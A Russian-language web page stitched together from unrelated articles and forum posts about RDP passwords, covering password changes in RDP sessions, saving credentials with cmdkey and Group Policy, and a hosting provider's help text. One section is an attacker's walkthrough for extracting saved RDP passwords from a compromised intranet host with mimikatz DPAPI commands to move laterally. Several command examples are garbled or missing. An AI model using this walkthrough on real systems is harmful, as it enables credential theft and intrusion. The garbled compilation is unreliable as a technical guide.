Посмотреть пароль от удаленного рабочего стола windows

При использовании удалённого подключения к операционным системам Microsoft Windows/Windows Server по протоколу RDP в некоторых случаях может возникать

Содержание

  1. Способы смены пароля учётной записи пользователя в RDP-сессии
  2. База знаний
  3. Где и как посмотреть пароль для подключения к виртуальной машине Windows или Linux (RDP/SSH)
  4. Ещё не пробовали услугу «Облачный хостинг» от Cloud4Y?
  5. Вход на удаленный компьютер по RDP с нужным логином и паролем
  6. Редактирование настроек подключения к удаленному рабочему столу
  7. Сохранение пароля с помощью cmdkey
  8. Использование bat файла
  9. Изменение пароля учетной записи по RDP
  10. Смена пароля в ОС Windows Server 2008
  11. Смена пароля в ОС Windows Server 2012 и Windows Server 2012 R2
  12. Смена пароля в ОС Windows Server 2016
  13. Альтернативный способ
  14. Разрешаем сохранение учетных данных при подключении по RDP

Способы смены пароля учётной записи пользователя в RDP-сессии

image 1При использовании удалённого подключения к операционным системам Microsoft Windows/Windows Server по протоколу RDP в некоторых случаях может возникать потребность в смене пароля учётной записи пользователя. При этом инициатором смены пароля в разных ситуациях может выступать как сам пользователь, так и администратор Windows-системы. В некоторых сценариях может получиться так, что, казалось бы, несложная задача смены пароля может стать не такой уж и простой. Поэтому в данной записи я попробую собрать информацию о самых разнообразных способах смены пароля учётной записи пользователя в RDP-сессии.

В случае, если пользователю Windows необходимо самостоятельно изменить пароль своей учётной записи, то в стандартной Windows-сессии пользователем может использоваться всем известное сочетание «горячих» клавиш Ctrl-Alt-Del. Это сочетание клавиш вызывает специальный экран Безопасности Windows (Windows Security), с которого доступна функция изменения пароля :

image4

Если же речь заходит об использовании горячих клавиш в RDP-сессиях, то стоит заметить то, что во избежание перехвата некоторых сочетаний клавиш локальной клиентской системой (системой, с которой запускается RDP-клиент), перенаправление сочетаний клавиш Windows должно быть явно разрешено в свойствах RDP-клиента. Например в клиенте mstsc.exe, встроенном в Windows, данную опцию можно включить на закладке управления локальными ресурсам.

image1

В стандартной первичной RDP-сессии для вызова специального экрана Безопасности Windows с функцией изменения пароля используется сочетание клавиш: CtrlAltEnd

В случае использования вложенных RDP-сессий (второго и последующего уровней), то есть когда из одной RDP-сессии открывается другая RDP-сессия, стандартное сочетание клавиш работать не будет. В разных источниках в интернете можно найти информацию об использовании более сложных сочетаний клавиш, таких как CtrlAltShift-End или Shift-Ctrl-Alt-End. Однако мои эксперименты с Windows 10/Windows Server 2012 R2 показали, что данные сочетания клавиш попросту не работают (возможно они работали в ранних версиях ОС Windows). В этом случае на выручку нам может прийти следующий способ.

В составе Windows имеется приложение «Экранная клавиатура» (On-Screen Keyboard), расположенное по умолчанию в %SystemRoot%System32osk.exe. Используя это приложение, мы можем решить проблему использования «горячих» клавиш во вложенных RDP-сессиях.

Находясь во вложенной RDP-сессии, вызовем окно запуска приложений. Вызвать его можно разными способами, например, через контекстное меню по кнопке Windows, или через Диспетчер задач (Task Manager):

image7

Либо можно использовать сочетание клавиш Win-R.

В окне запуска приложений выполним запуск исполняемого файла osk.exe

image411

После того, как откроется приложение «Экранная клавиатура», нажмём на физической клавиатуре сочетание клавиш CtrlAlt, так, чтобы это отобразилось на экранной клавиатуре и затем, удерживая это сочетание клавиш, на экранной клавиатуре мышкой нажмём кнопку Del.

image10

Таким образом мы отправим в удалённую RDP-сессию сочетание клавиш Ctrl-Alt-Del, в следствие чего откроется специальный экран Безопасности Windows с функцией изменений пароля пользователя.

Способ №3 – Ярлык на VBS-скрипт или Powershell

Вызов экрана Безопасности Windows можно выполнить не только интерактивными способами, но и программными, например, с помощью скриптов.

Разместим скрипт в месте, доступном на чтение (но не для редактирования) для всех пользователей удалённого рабочего стола, например в каталоге %SystemRoot% ( C:Windows ). А ярлык на запуск скрипта можно разместить в любом доступном пользователям месте, например, в каталоге общего профиля %SystemDrive%UsersPublicDesktop

image13

При запуске данного ярлыка у пользователя будет открываться экран Безопасности Windows с возможностью изменения пароля.

Для любителей PowerShell приведённый VBS-скрипт можно заменить PS-скриптом следующего вида:

Либо запускать из ярлыка команду вида:

image16

Однако стоит отметить тот факт, что запуск варианта с PowerShell будет происходить медленней, чем варианта с VBS-скриптом.

Описанные здесь способы с запуском ярлыка, ссылающегося на скрипт, может попросту не сработать, так как в некоторых окружениях серверов служб удалённых рабочих столов может быть заблокирована возможность выполнения скриптов. В таком случае, можно воспользоваться следующим способом.

Способ №4 – Ярлык оболочки Windows Explorer

Если говорить о создании ярлыка запуска экрана Безопасности Windows, то имеется ещё один вариант создания такого ярлыка. Создаётся ярлык со ссылкой на расширение оболочки Windows Explorer следующего вида:

image19

Опять же, при запуске такого ярлыка у пользователя будет открываться экран Безопасности Windows с возможностью изменения пароля. Этот способ одинаково хорошо работает на Windows 10 и на Windows Server 2012 R2.

Способ №5 – Панель управления Windows (локальные учётные записи)

Данный способ относится лишь к локальным учётным записям пользователей. Изменить пароль учётной записи рядового локального пользователя можно через Панель управления Windows. В Windows 10 из раздела Панели управления «Учётные записи пользователей» доступен вызов окна «Параметры компьютера«, в котором имеется функция изменения пароля текущего локального пользователя.

image28

Такие методы вызова апплета управления учётными записями пользователей Панели управления Windows, как, например команда «control userpasswords2«, в качестве отдельного способа мы выделять не будем, так как подобные действия требуют административных прав в удалённой системе. То же самое касается и таких CLI-утилит Windows, как net.exe ( %SystemRoot%System32net.exe ) (пример команды «net user username newpassword«), так как они тоже требуют повышения уровня прав пользователя.

Ремарка

Отдельно хочется отметить обстоятельство, про которое порой забывают администраторы, и это может приводить к разным курьёзным ситуациям.

Попытки смены пароля, инициированные самим пользователем, могут оказаться безуспешными в случае, если пароль был недавно изменён и на удалённую Windows систему действует политика безопасности, определяющая минимальный срок действия пароля.

image 2

Повторюсь, что повлиять на ситуацию эта политика может только в случаях, когда пользователь самостоятельно инициирует процедуру смены пароля.

Далее мы поговорим о сценарии, при котором требование смены пароля включается для учётной записи пользователя форсировано администратором сервера (для локальных учётных записей), либо администратором службы каталогов Active Directory (для доменных учётных записей).

image41

Практика показывает, что как только администратором включено требование смены пароля пользователя при следующем входе в систему, у пользователя могут возникнуть проблемы с подключением по протоколу RDP, если на стороне RDS сервера (а в некоторых случаях и на стороне RDS клиента) предварительно не предпринято никаких действий по специальной настройке обработки таких ситуаций. Далее мы рассмотрим пару примеров такой настройки.

Клиентский доступ к службам Windows Server RDS может быть организован через веб-интерфейс серверной роли Remote Desktop Web Access (RDWA). В функционале этой роли имеется выключенная по умолчанию возможность смены пароля пользователя в процессе аутентификации на веб-странице RDWA.

Чтобы включить данную возможность в Windows Server 2012/2012 R2 откроем консоль управления Internet Information Services (IIS) Manager, выберем сайт RDWA, развернём RDWeb > Pages и в разделе настроек ASP.NET выберем настройку опций веб-приложения Application Settings:

image 3

В перечне опций находим PasswordChangeEnabled и меняем установленное по умолчанию значение false на true:

image 4

Если серверов RDWA несколько и они работают в пуле за балансировщиком, например Windows NLB, то не забываем выполнить данное изменение на всех других серверах пула.

Теперь попытаемся от имени пользователя, у которого в свойствах учётной записи установлено требование смены пароля при следующем входе, аутентифицироваться на веб-странице RDWA:

image 5

После ввода учётных данных пользователя появится сообщение о том, что пароль пользователя требует замены и ссылка на страницу с функцией смены пароля ( https:// /RDWeb/Pages/ru-RU/password.aspx ):

image 6

На этой отдельной странице пользователь сможет ввести свои текущие учётные данные и новый пароль:

image 7

В случае успешной смены пароля пользователь получит соответствующее сообщение: image 8

При необходимости ссылку на страницу смены пароля можно сделать доступной не только тем пользователям, у которых после аутентификации возникает требование смены пароля, но и всем остальным пользователям, чтобы они могли самостоятельно выполнять смену пароля по собственной инициативе через веб-страницу RDWA. Для этого можно будет внедрить ссылку на страницу password.aspx на странице входа login.aspx (по умолчанию страницы расположены в каталоге %windir%WebRDWebPagesru-RU )

Способ №7 – Специальный RDP-файл

Если пользователь выполняет подключение к удалённому рабочему столу на базе Windows Server 2012/2012 R2 через прямой запуск стандартного клиента mstsc.exe, то в ситуации с включенным признаком требования смены пароля, попытка подключения может быть завершена с ошибкой » You must change your password before logging on the first time. Please update your password or contact your system administrator or technical support «.

image 9

Если ситуация требует того, чтобы пользователь самостоятельно изменил свой пароль при первом входе в систему, то это потребует некоторого изменения уровня безопасности настроек протокола RDP на стороне RDS сервера и подготовки специального RDP-файла на стороне клиента.

Сначала на клиентской стороне откроем mstsc.exe, настроим все нужные параметры подключения к серверу RDS и используя кнопку Сохранить как, создадим RDP-файл.

image31

После этого откроем RDP-файл в текстовом редакторе и добавим в конец файла строку «enablecredsspsupport:i:0«

image61

image91

Разрешить эту ситуацию можно только понизив уровень безопасности RDP на стороне RDS сервера, отключив обязательное требование проверки подлинности на уровне сети (NLA). Изменить эту настройку можно в свойствах системы на закладке Удалённый доступ:

image12

В английской версии Windows название опции звучит как «Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)»

Если NLA нужно отключить на уровне коллекции серверов Windows Server 2012 R2, то сделать этом можно в свойствах коллекции сеансов, например через оснастку Server Manager:

image 10

После того, как отключено требование NLA на стороне RDS сервера, клиент с помощью специального RDP-файла, о котором мы сказали выше, должен успешно установить RDP-сессию и уже в ней получить сообщение о необходимости смены пароля:

image151

И после этого пользователю будет показан экран, на котором он сможет задать новый пароль:

image181

После успешной смены пароля последующие подключения по протоколу RDP будут проходить в штатном режиме без лишних запросов.

Заключение

Приведённый здесь перечень способов смены пароля при использовании протокола RDP не претендует на какую-то полноту и исключительность, а лишь отражает ту информацию, которую мне удалось найти в разных источниках по этому поводу. На мой взгляд, ни один из перечисленных способов нельзя считать наиболее удобным или универсальным, так как каждый из способов может применяться в определённых ограниченных сценариях и имеет, как преимущества, так и недостатки по сравнению с другими способами.

Дополнительные источники информации:

Источник

База знаний

Где и как посмотреть пароль для подключения к виртуальной машине Windows или Linux (RDP/SSH)

Для вновь созданной виртуальной машины Windows, имя пользователя и пароль администрирования можно посмотреть в личном кабинете.

Для просмотра пароля администратора Windows:

— Откройте соответствующую Вашу виртуальную машину
— В настройках виртуальной машины, для того, чтобы посмотреть пароль для доступа/подключения по RDP, нажмите на ссылку «пароль» ( выделено на рисунке ниже ).

6

Для подключения соответственно используйте имя пользователя «administrator», пароль соответственно тот, который выведется после нажатия на ссылку «показать». Адрес Вашего виртуального хоста ( сервер для подключения соовтетственно находится в поле «IP адреса»

Для виртуальной машины Linux соответственно пароль для подключения по протоколу SSH можно узнать ( показано на рисунке ниже ):

5

Соответственно для подключения используйте любой доступный Вам клиент SSH ( можно свободно загрузить в нтернете ):
Адрес сервера для подключения соответственно находится в поле «IP адреса»
Има пользователя соответственно: «root», пароль соответственно тот, что будет выведен после нажатия на ссылку

Теперь у Вас есть все данные для подключения к Вашему облачному ресурсу.

Ещё не пробовали услугу «Облачный хостинг» от Cloud4Y?

Отправьте заявку сейчас и получите 10-ти дневный бесплатный доступ.

Источник

rdp xpВход на удаленный компьютер по RDP с нужным логином и паролем

5717

Редактирование настроек подключения к удаленному рабочему столу

По умолчанию, программа удаленного настроена так, что она сохраняет только логин пользователя, без его пароля. Включить сохранение пароля достаточно легко, для этого нужно запустить программу «Подключение к удаленному рабочему столу», и отметить галочкой пункт «Разрешить мне сохранять учетные данные».

mstsc IKURCaPu8G

Если Вы используете подключение к удаленному рабочему столу через ранее сохраненный RDP файл, то нужно нажать на нем правой кнопкой мыши, и выбрать пункт «Изменить», и проделать выше описанные действия.

По завершению редактирования RDP файла, его нужно сохранить, нажав кнопку «Сохранить».

mstsc hOPdYewkRV

Сохранение пароля с помощью cmdkey

Существующая в операционных системах консольная утилита cmdkey позволяет управлять сохраненными паролями на компьютере, в том числе и для удаленных подключений. Сохранить с её помощью пароль для подключения можно следующим образом:

При этом, не стоит забывать, что если пользователь в домене, то его имя нужно указывать в формате ДОМЕНПОЛЬЗОВАТЕЛЬ.
То есть, для пользователя с логином sysadmin, и паролем dontshowit, который соединяется на сервер TERMSRV, нужно выполнить следующую команду

Использование bat файла

Альтернативным методом, который может пригодиться для того случая, когда использование первого и второго способа по каким-то причинам не работает, является использование bat файла, комбинирующим в себе первый и второй способы.

То есть, если предположить, что у нас есть пользователь sysadmin с паролем dontshowit, и ему нужно зайти на сервер TERMSRV, то выглядеть это будет следующим образом:

Источник

Изменение пароля учетной записи по RDP

Одной из хороших привычек любого пользователя ПК, а тем более системного администратора, является периодическая смена паролей учетных записей. Главное потом его не забыть.

В операционных системах семейства Microsoft Windows Server, для смены пароля, привычно использовать сочетание клавиш Ctrl + Alt + Del. проблема в том, что “три кнопки” нельзя использовать через “Подключение к удаленному рабочему столу”. Рассмотрим как все таки изменить пароль.

Смена пароля в ОС Windows Server 2008

В ОС Windows Server 2008 это можно сделать из меню Пуск, кликнув по “Безопасность Windows”.

На обновлённом экране выбираем экране выбираем “Сменить пароль”.

Вводим старый пароль и новый и его подтверждение.

Смена пароля в ОС Windows Server 2012 и Windows Server 2012 R2

В ОС Windows Server 2012 и Windows Server 2012 R2 несколько усложнилась задача.

Открываем блокнот и пишем две строки:

set objShell = CreateObject(«shell.application»)
objshell.WindowsSecurity

В новом окне выбираем директорию для сохранения файла, например, Рабочий стол. В Тип файла выбираем Все файлы, а в Имя файла указываем произвольное имя, например, 1.vbs.

После сохранения файла, он уже готов к исполнению. Двойной клик левой кнопкой мыши вызовет экран, в которым следует выбрать “Сменить пароль”.

Далее все привычно.

72 29 7Скриншот №7. Подтверждение действия

Заполняем поля со старым паролем, указываем новый пароль и его подтверждение. Кликаем по иконке стрелки.

Смена пароля в ОС Windows Server 2016

ОС Windows Server 2016 радует своим расположением к пользователю, но чтобы изменить удаленно пароль, все равно нужно поискать этот пункт.

Открываем меню Пуск и кликаем по значку пользователя, в открывшемся меню выбираем “Изменить параметры учетной записи”.

В открывшемся окне “Параметры” выбираем “Параметры входа”, а в секции Пароль кликаем по кнопке Изменить.

В новом окне, указываем текущий пароль и кликаем по кнопке Далее.

Окно обновится и запросит новый пароль, его подтверждение, а также подсказку к паролю. Кликаем по кнопке далее. В итоге, кликаем по кнопке Готово. Следующий вход в систему будет происходить под новым паролем.

Альтернативный способ

Этот способ применим как для изменения пароля к своей учетной записи, так и к учетным записям других пользователей.

В меню Пуск, выбираем Администрирование (“Средства администрирования” в Windows Server 2016).

В новом окне двойным кликом мыши открываем “Управление компьютером”.

В левой части открывшегося окна раскрываем ветку “Локальные пользователи и группы” и открываем папку Пользователи. В основной части окна, кликаем правой кнопкой мыши по пользователю и в контекстном меню выбираем “Задать пароль. ”.

В новом окне указываем новый пароль и его подтверждение. По окончании кликаем по кнопке OK.

Источник

Разрешаем сохранение учетных данных при подключении по RDP

При подключении к удаленному рабочему столу по RDP есть возможность сохранить учетные данные, чтобы не вводить их каждый раз. Но есть одна тонкость. Так если подключаться с компьютера, находящегося в домене, к компьютеру в рабочей группе, то использовать сохраненные данные не удастся, а будет выдано сообщение примерно такого содержания:

«Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера, так как его подлинность проверена не полностью. Введите новые учетные данные.»

sc1

Дело в том, что сохранение учетных данных при подключении к удаленному компьютеру запрещено доменными политиками по умолчанию. Однако такое положение вещей можно изменить.

На компьютере, с которого осуществляется подключение, нажимаем Win+R и вводим команду gpedit.msc, затем жмем OK. Дополнительно может потребоваться ввод пароля администратора или его подтверждения, в зависимости от политики UAC.

sc2

Включаем политику, затем жмем на кнопку Показать, чтобы добавить в список серверы, к которым собираемся подключаться.

sc3

Заполнять список можно несколькими способами. Например:

• TERMSRV/удаленный_пк — разрешаем сохранять учетные данные для одного конкретного компьютера;
• TERMSRV/*.contoso.com — разрешаем сохранять данные для всех компьютеров в домене contoso.com;
• TERMSRV/* — разрешаем сохранять данные для всех компьютеров без исключения.

Внимание: используйте в TERMSRV заглавные буквы, как в примере. Если указан конкретный компьютер, то значение удаленный_пк должно полностью совпадать с именем, введенным в поле «Компьютер» удаленного рабочего стола.

sc4

Заполнив список жмем OK и закрываем редактор групповых политик. Открываем командную консоль и обновляем политики командой gpupdate /force. Все, можно подключаться.

И еще. Используя локальные групповые политики мы разрешаем сохранять учетные данные только на одном конкретном компьютере. Для нескольких компьютеров будет лучше создать в домене отдельное OU и привязать к нему соответствующую доменную политику.

Источник

  • Remove From My Forums
  • Вопрос

  • Ситуация:
    имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
    Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
    Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.

    P.S.  Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.

    • Изменено

      28 сентября 2009 г. 14:46
      Добавлен p.s.

Ответы

  • Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»


    MCSE, MCTS, MCITP, STS, VTSP

    Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey

    • Предложено в качестве ответа
      Buchenkov Andrey
      29 сентября 2009 г. 5:55
    • Помечено в качестве ответа
      gamumba
      29 сентября 2009 г. 6:55

0x01 введение

После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.

0x02 Получить пароль RDP, сохраненный локально на управляемой машине

Один, мимикатц

1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.

reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s

2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.

dir /a %userprofile%AppDataLocalMicrosoftCredentials*

Просмотр информации об удаленном хосте, сохраненной локально

cmdkey /list

3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.

mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58

4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.

mimikatz # sekurlsa::dpapi

5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.

mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

Два, netpass

скачать:
netpass


использовать:
Дважды щелкните netpass.exe.

Три, другие

Скрипт Powershell для автоматизации дешифрования …

Содержание

  1. Password Recovery Software
  2. Articles and video
  3. Network Password Recovery Wizard: пароли удаленного рабочего стола
  4. Не сохраняются пароли для RDP подключений
  5. Настройки сохранения пароля для RDP подключения
  6. Что делать, если в Windows не сохраняется пароль для RDP подключения?
  7. RDP — где посмотреть логин и пароль ?

Password Recovery Software

Articles and video

Network Password Recovery Wizard:
пароли удаленного рабочего стола

Так выглядит финальный диалог Мастера программы с найденными и расшифрованными паролями удаленного рабочего стола (в автоматическом режиме работы).

Пароли Remote Desktop Connections хранятся в *.rdp файлах и обычно находятся в папке ‘My Documents‘ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.

Если *.rdp файл по какой-то причине не был найден, то можно воспользоваться поиском самостоятельно и указать путь к нему вручную.

Посмотреть список доступных конфигураций удаленного рабочего стола можно из меню Пуск -> Все программы -> Стандартные -> Связь -> Подключение к удаленному рабочему столу.

После того, как необходимая конфигурация будет выбрана, можно переходить к следующему шагу Мастера программы — указанию дополнительных параметров для расшифровки. Поскольку пароль удаленного рабочего стола шифруется с помощью системного механизма DPAPI, то нам необходимо знать три вещи:

  1. Логон пароль владельца информации (rdp файла в нашем случае)
  2. Мастер Ключ пользователя
  3. И его SID.

Как правило, в случае с локальной учетной записью, последние два параметра заполняются программой автоматически. Иначе, вам необходимо позаботиться об этом самостоятельно.

Не сохраняются пароли для RDP подключений

Встроенный RDP клиент Windows (mstsc.exe) позволяет сохранить на компьютере имя и пароль пользователя, который использовался для подключения. Благодаря этому пользователю не нужно каждый раз вводить пароль для подключения к удаленному RDP компьютеру/серверу. В этой статье мы рассмотрим, как настроить возможность сохранения учетных данных для RDP подключения в Windows 10 / Windows Server 2012 R2/2016 и что делать, если несмотря на все настройки, у пользователей не сохранятся пароли для RDP подключения (пароль запрашивается каждый раз)

Настройки сохранения пароля для RDP подключения

По умолчанию Windows разрешает пользователям сохранять пароли для RDP подключений. Для этого в окне клиента RDP (mstsc) пользователь должен ввести имя удаленного RDP компьютера, учетную запись и поставить галку “Разрешить мне сохранять учетные данные” (Allow me to save credential). После того, как пользователь нажимает кнопку “Подключить”, RDP сервер запрашивает пароль и компьютер сохраняет его в Windows Credential Manager (не в .RDP файл).

В результате при следующем подключении к удаленному RDP серверу под этим же пользователь, пароль автоматически берется из Credential Manager и используется для RDP-авторизации.

Как вы видите, если для данного компьютера имеется сохраненный пароль, в окне RDP клиента указано:

Если вы подключаетесь с компьютера, включенного в домен, к компьютеру/серверу, который находится в другом домене или рабочей группе, по-умолчанию Windows не разрешает пользователю использовать сохраненный пароль RDP подключения. Несмотря на то, что пароль для подключения сохранен в Credentials Manager, система не позволяет его использовать, каждый раз требуя от пользователя вводить пароль. Также Windows не разрешает использовать сохраненный пароль для RDP, если вы подключаетесь не под доменной, а под локальной учетной записью.

При попытке RDP подключения с сохраненным паролем в этой ситуации появляется окно с ошибкой:

Your Credentials did not work
Your system administrator does not allow the use of saved credentials to log on to the remote computer CompName because its identity is not fully verified. Please enter new credentials.

Или (в русской редакции Windows 10):

Windows считает такое подключение небезопасным, т.к. отсутствуют доверительные отношения между этим компьютером и удаленным компьютером/сервером в другом домене (или рабочей группе).

Вы можете изменить эти настройки на компьютере, с которого выполняется RDP подключение:

    1. Откройте редактор локальной GPO, нажав Win + R ->gpedit.msc ;
    2. В редакторе GPO перейдите в раздел Computer Configuration –> Administrative Templates –> System –> Credentials Delegation (Конфигурация компьютера -> Административные шаблоны -> Система -> Передача учетных данных). Найдите политику с именем Allow delegating saved credentials with NTLM-only server authentication (Разрешить делегирование сохраненных учетных данных с проверкой подлинности сервера только NTLM);
    3. Дважды щелкните по политике. Включите политику (Enable) и нажмите на кнопку Показать (Show);
    4. В открывшемся окне нужно будет указать список удаленных компьютеров (серверов), для которых будет разрешено использовать сохранные пароли для RDP подключения.Список удаленных компьютеров нужно указать в следующих форматах:
      • TERMSRV/server1 — разрешить использование сохранённых паролей для RDP подключения к одному конкретному компьютеру/серверу;
      • TERMSRV/*.winitpro.ru — разрешить RDP подключение ко всем компьютерам в домене winitpro.ru;
      • TERMSRV/* — разрешить использование сохранённого пароля для подключения к любым компьютерам.

    Теперь при выполнении RDP подключения клиент mstsc сможет использовать сохранённый пароль.

    С помощью локального редактора групповых политик вы сможете переопределить политику только на локальном компьютере. В том случае, если вы хотите, чтобы эта политика разрешения использования сохраенных паролей для RDP подключения действовала на множество компьютеров домена, используете доменные политики, которые настраиваются с помощью консоли gpmc.msc.

    Что делать, если в Windows не сохраняется пароль для RDP подключения?

    Если вы настроили Windows по инструкции выше, но клиент все равно при каждом повторном RDP подключении требует ввести пароль следует проверить следующее:

    1. В окне RDP подключения нажмите на кнопку “Показать параметры” и убедитесь, что опция “Всегда запрашивать учетные данные” (Always ask for credentials) не выбрана;
    2. Если вы используете для подключения сохранённый RDP файл, проверьте, что параметр “prompt for credentials” равен 0 ( prompt for credentials:i:0 );
    3. Откройте редактор GPO gpedit.msc, перейдите в раздел Конфигурация компьютера -> Компоненты Windows -> Службы удаленных рабочих столов -> Клиент подключения к удаленному рабочему столу (Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client). Параметр “Запретить сохранение паролей” (Do not allow passwords to be saved) должен быть не задан или отключен. Также убедитесь, что он отключен в результирующей политике на вашем компьютере (html отчет с применёнными настройками доменных политик можно сформировать с помощью gpresult);
    4. Удалите все сохраненные пароли в менеджере паролей Windows (Credential Manager). Наберите control userpasswords2 и в окне “Учетные записи пользователей” перейдите на вкладку “Дополнительно” и нажмите на кнопку “Управление паролями”; В открывшемся окне выберите “Учетные данные Windows”. Найдите и удалите все сохраненные RDP пароли (начинаются с TERMSRV/…).

    После этого, пользователи смогут использовать свои сохраненные пароли для rdp подключений.

RDP — где посмотреть логин и пароль ?

Все новые темы

Автор
moby048
Участник форума

Зарегистрирован: 13.09.2015
Пользователь #: 158,253
Сообщения: 112

Добавлено: Сб 16 Янв, 2016 18:27 Заголовок сообщения: RDP — где посмотреть логин и пароль ?
Вернуться к началу

Зарегистрируйтесь и реклама исчезнет!

ISITP
Новичок

Зарегистрирован: 27.12.2015
Пользователь #: 159,689
Сообщения: 75


Голоса: 2

Добавлено: Сб 16 Янв, 2016 19:39 Заголовок сообщения:
_________________
Инфобезопасности много не бывает, бывает плохая оценка рисков. (с)
http://defsis.ru/
Вернуться к началу

chastener
Житель sysadmins

Зарегистрирован: 29.06.2011
Пользователь #: 132,104
Сообщения: 8123


Голоса: 39

Добавлено: Сб 16 Янв, 2016 19:56 Заголовок сообщения:
Вернуться к началу

KIRALEX
Участник форума

Зарегистрирован: 25.11.2015
Пользователь #: 159,148
Сообщения: 247


Голоса: 1

Добавлено: Вс 17 Янв, 2016 14:59 Заголовок сообщения:
Вернуться к началу

moby048
Участник форума

Зарегистрирован: 13.09.2015
Пользователь #: 158,253
Сообщения: 112

Добавлено: Вс 17 Янв, 2016 15:27 Заголовок сообщения:
Вернуться к началу

moby048
Участник форума

Зарегистрирован: 13.09.2015
Пользователь #: 158,253
Сообщения: 112

Добавлено: Вс 17 Янв, 2016 15:27 Заголовок сообщения:
Вернуться к началу

moby048
Участник форума

Зарегистрирован: 13.09.2015
Пользователь #: 158,253
Сообщения: 112

Добавлено: Вс 17 Янв, 2016 15:31 Заголовок сообщения:
Вернуться к началу

moby048
Участник форума

Зарегистрирован: 13.09.2015
Пользователь #: 158,253
Сообщения: 112

Добавлено: Вс 17 Янв, 2016 15:45 Заголовок сообщения:
Вернуться к началу

ISITP
Новичок

Зарегистрирован: 27.12.2015
Пользователь #: 159,689
Сообщения: 75


Голоса: 2

Добавлено: Вс 17 Янв, 2016 16:11 Заголовок сообщения:
_________________
Инфобезопасности много не бывает, бывает плохая оценка рисков. (с)
http://defsis.ru/
Вернуться к началу

KIRALEX
Участник форума

Зарегистрирован: 25.11.2015
Пользователь #: 159,148
Сообщения: 247

Читайте также:  Как отключить one driver windows 10 навсегда

Adblock
detector

Главная » Безопасность » Вход на удаленный компьютер по RDP с нужным логином и паролем

При подключении сетевого принтера запрашивается пароль: как узнать пароль, как создать пользователя при подключении принтера к сети.

Принтер предназначен для печати необходимых документов. В целом при его эксплуатации у пользователей не возникает проблем, процесс работы подробно описан в инструкции. Однако для расширения возможностей оборудования его необходимо подключить к сети. Для того чтобы сделать сетевой принтер, нужно правильно войти в систему. Всю необходимую информацию можно прочитать в руководстве по эксплуатации техники. Если в процессе подсоединения требуется ввести пароль, многие пользователи задаются вопросом о том, где его найти.

При совместной работе беспроводных устройств – телефона, компьютера, принтера, требуется узнать код сети. Поставщик услуг Интернета обязательно представляет пользователю требуемый код. Как правило, его можно найти в документации договора, или узнать, осмотрев сам маршрутизатор – код указывается на этикетке.

Подключение сетевого принтера

Подключение сетевого принтера

Если же последняя потеряна и документация на данный момент недоступна, можно узнать код для Canon или HP, посмотрев его на любом другом компьютере, который уже подключен к сети. Для этого выполняются следующие действия:

  • в операционной программе Windows 10 открывают пункт: «Посмотреть сетевые подключения»;
  • щелкнув по названию вашей сети, нажимают на «Статус»;
  • находят вкладку «Безопасность», затем во вкладке устанавливают флажок напротив пункта «Отображать вводимые знаки». После это код становится видимым.

Таким образом можно узнать пароль от принтера Canon и ввести его, когда аппарат будет его требовать.

Ведение пароля

Сохранение пароля с помощью cmdkey

Существующая в операционных системах консольная утилита cmdkey позволяет управлять сохраненными паролями на компьютере, в том числе и для удаленных подключений. Сохранить с её помощью пароль для подключения можно следующим образом:

  1. Необходимо под нужным пользователем запустить командную строку.
  2. В ней запускаем утилиту cmdkey со следующими параметрами:

При этом, не стоит забывать, что если пользователь в домене, то его имя нужно указывать в формате ДОМЕНПОЛЬЗОВАТЕЛЬ.
То есть, для пользователя с логином sysadmin, и паролем dontshowit, который соединяется на сервер TERMSRV, нужно выполнить следующую команду

Включаем сохранение учетных данных при удаленном подключении в Windows

Встроенная в Windows возможность удаленного подключения, конечно, не так продвинута, как тот же UltraVNC, но чем она удобна, так это как раз встроенностью.

При совершении подключения к удаленному компьютеру есть возможность сохранить пароль от своей учетной записи. Это удобно при частых подключениях и если Вы уверены, что это никак не скажется на безопасности. Однако не исключено, что Вы встретите и вот такое сообщение: Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера, так как его подлинность проверена не полностью. Исправим это досадное недоразумение.

Включаем сохранение учетных данных при удаленном подключении в Windows

Непосредственно ошибка.

Причина ошибки кроется в том, что по умолчанию сохранение учетных данных запрещено локальной групповой политикой. Для редактирования данной политики нажимаем Пуск → Выполнить и вводим gpedit.msc. Откроется редактор локальных групповых политик.

Включаем сохранение учетных данных при удаленном подключении в Windows

Нам нужно перейти в ветку Конфигурация компьютера → Административные шаблоны → Система → Передача учетных данных и найти пункт Разрешить делегирование сохраненных учетных данных с проверкой подлинности сервера «только NTLM».

